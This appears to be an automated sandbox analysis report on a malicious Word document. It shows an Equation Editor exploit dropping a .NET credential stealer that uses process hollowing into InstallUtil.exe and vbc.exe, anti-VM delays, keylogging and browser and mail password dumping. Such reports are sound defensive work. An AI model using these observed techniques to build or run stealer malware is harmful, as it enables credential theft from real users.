            Source: C:\Users\user\AppData\Roaming\name.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
            Source: 280072109764552.docStatic file information: File size 2202571 > 1048576
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2363878816.00000000004E0000.00000004.00000001.sdmp
            Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe
            Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe
            Source: Binary string: InstallUtil.pdb source: name.exe, 00000004.00000002.2153168728.0000000006870000.00000004.00000001.sdmp, InstallUtil.exe

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs | .Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs | .Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs | .Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs | .Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_00404837 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,
            Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4_2_0003260D push cs; iretd
            Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4_2_00035610 push esi; iretd
            Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4_2_0003401C pushad ; retf
            Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4_2_00035A34 push eax; retf
            Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4_2_00035A47 push eax; retf
            Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4_2_00034E93 pushad ; retf
            Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4_2_00032894 push ds; iretd
            Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4_2_00034D05 pushad ; retf
            Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4_2_00036D50 push es; ret
            Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4_2_00033955 push esi; retf
            Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4_2_00035992 push eax; retf
            Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4_2_00033FDC pushad ; retf
            Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4_2_000355E2 push 664C7BE7h; iretd
            Source: C:\Users\user\AppData\Roaming\name.exe | Code function: 4_2_00034FE7 push 680E75D9h; retf
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_00411879 push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_004118A0 push eax; ret (2 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 7_2_00442871 push ecx; ret
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 7_2_00442A90 push eax; ret (2 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 7_2_00446E54 push eax; ret
            Source: 4.2.name.exe.30000.0.unpack, Sz9/n0P.cs | High entropy of concatenated method names: '.ctor', 'o5G', 'k2L', 'd4D', 'k5R', 'k5G', 'p5N', 'Lk2', 'c6F', 'Ri8'
            Source: C:\Users\user\AppData\Roaming\name.exe | File created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\name.exe

            Hooking and other Techniques for Hiding and Protection:

            Changes the view of files in windows explorer (hidden files and folders)
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Users\user\AppData\Roaming\name.exe | File opened: C:\Users\user\AppData\Roaming\name.exe\:Zone.Identifier read attributes | delete
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_0040F64B memset,strcpy,memset,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\name.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM3
            Source: Yara match | File source: Process Memory Space: name.exe PID: 1776, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 2964, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
            Source: C:\Users\user\AppData\Roaming\name.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Thread delayed: delay time: 180000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Window / User API: threadDelayed 386
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2400 | Thread sleep time: -300000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\name.exe TID: 2548 | Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\name.exe TID: 2516 | Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Users\user\AppData\Roaming\name.exe TID: 1952 | Thread sleep count: 340 > 30
            Source: C:\Users\user\AppData\Roaming\name.exe TID: 2516 | Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2616 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 1288 | Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2316 | Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2324 | Thread sleep time: -140000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 2280 | Thread sleep time: -77200s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe TID: 1484 | Thread sleep time: -180000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 7_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 7_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 7_2_004161B0 memset,GetSystemInfo,
            Source: C:\Users\user\AppData\Roaming\name.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\name.exe | Thread delayed: delay time: 30000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Thread delayed: delay time: 120000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Thread delayed: delay time: 140000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Thread delayed: delay time: 180000
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
            Source: C:\Users\user\AppData\Roaming\name.exe | Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 7_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_00404837 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA,
            Source: C:\Users\user\AppData\Roaming\name.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\name.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            .NET source code references suspicious native API functions
            Source: 5.2.InstallUtil.exe.400000.0.unpack, Form1.cs | Reference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
            Source: 5.2.InstallUtil.exe.400000.0.unpack, RunPE.cs | Reference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
            Allocates memory in foreign processes
            Source: C:\Users\user\AppData\Roaming\name.exe | Memory allocated: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Injects a PE file into foreign processes
            Source: C:\Users\user\AppData\Roaming\name.exe | Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Sample uses process hollowing technique
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Writes to foreign memory regions
            Source: C:\Users\user\AppData\Roaming\name.exe | Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 400000
            Source: C:\Users\user\AppData\Roaming\name.exe | Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 402000
            Source: C:\Users\user\AppData\Roaming\name.exe | Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 482000
            Source: C:\Users\user\AppData\Roaming\name.exe | Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 486000
            Source: C:\Users\user\AppData\Roaming\name.exe | Memory written: C:\Users\user\AppData\Local\Temp\InstallUtil.exe base: 7EFDE008
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\name.exe 'C:\Users\user\AppData\Roaming\name.exe'
            Source: C:\Users\user\AppData\Roaming\name.exe | Process created: C:\Users\user\AppData\Local\Temp\InstallUtil.exe C:\Users\user\AppData\Local\Temp\InstallUtil.exe
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
            Source: InstallUtil.exe, 00000005.00000002.2365146577.0000000001250000.00000002.00000001.sdmp | Binary or memory string: Program Manager
